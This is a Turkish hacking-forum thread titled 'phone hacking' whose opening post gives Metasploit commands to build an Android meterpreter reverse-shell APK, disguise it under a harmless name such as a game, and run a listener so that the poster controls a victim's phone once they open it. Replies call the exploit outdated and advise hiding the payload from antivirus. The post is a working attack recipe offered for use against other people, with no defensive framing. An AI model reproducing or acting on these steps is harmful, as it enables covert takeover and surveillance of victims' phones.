TELEFON HACKLEME !

• Konuyu Başlatan Konuyu Başlatan Visual
  • Başlangıç tarihi Başlangıç tarihi
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Visual

Efsane Üye
Kali linux ile bu işlemleri yapacaz.

terminali açın ve bunları yazın : msfpayload android/meterpreter/reverse_tcp LHOST=ipadresinizLPORT=portnumarasınıgirin(8080 yada 4444) R > xD.apk

xD.apk ya istediğiniz ismi yazabiliriniz örnek minecraft.apk

başka terminal açarak ifconfig yazın ve ip adresinizi öğrenin.

ratismi.apk dosyamız oluşturuldu home dizininde bulabilirsiniz.

metasploit'i açın ve şu komutları yazın ;

> use exploit/multi/handler

> set payload android/meterpreter/reverse_tcp

> set lhost 192.168.45.4

> set lport 8080

> exploit

hedef ıp adresini ve portu dinlemeye aldı şimdi yapılacak tek şey apk dosyasını kurbanın telefonunda açmasını sağlamak

eğer programı açarsa terminalde connected yazısı gözükecektir.

artık hedef telefondasınız. istediğinizi yapabilirsiniz.
not: Sorumluluk kabul etmiyorum.

telefon kapandığı zaman exploitte kapanır exploit kaliteli değil konu paylaşırken dikkatli olunuz. işinize pek yarayacağını düşünmüyorum hem crypti dandik hemde telefon kapanınca exploitte kapanıyor komik :D

telefon kapandığı zaman exploitte kapanır exploit kaliteli değil konu paylaşırken dikkatli olunuz. işinize pek yarayacağını düşünmüyorum hem crypti dandik hemde telefon kapanınca exploitte kapanıyor komik :D
Senden de bir paylaşım bekliyoruz.

Senden de bir paylaşım bekliyoruz.
attığın exploit 10 yıllık dostum lütfen birbirimizi kandırmayalım androidin sürümüne kitkat dediği dönemlerde çıktı burda benim paylaşmamla alakalı birşey yok benim kendi exploitim var bu tür çöp exploitler kullanmayınız sadece bunu söylerim.

attığın exploit 10 yıllık dostum lütfen birbirimizi kandırmayalım androidin sürümüne kitkat dediği dönemlerde çıktı burda benim paylaşmamla alakalı birşey yok benim kendi exploitim var bu tür çöp exploitler kullanmayınız sadece bunu söylerim.
Attığın yoruma bişey demedim ki niye bu kadar atarlanıyorsun sende paylaş kullanalım dedim.

Meterpreter antivirusleri ambulans gibi ötürmesinin harici güzel konu sadece virusü biraz saklamak lazım;)

rat konuları yasak diye biliyorum yasak diye ben bir çok bilgimi kendime saklıyordum

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Şuanda konuyu görüntüleyen kullanıcılar

Geri
Üst Alt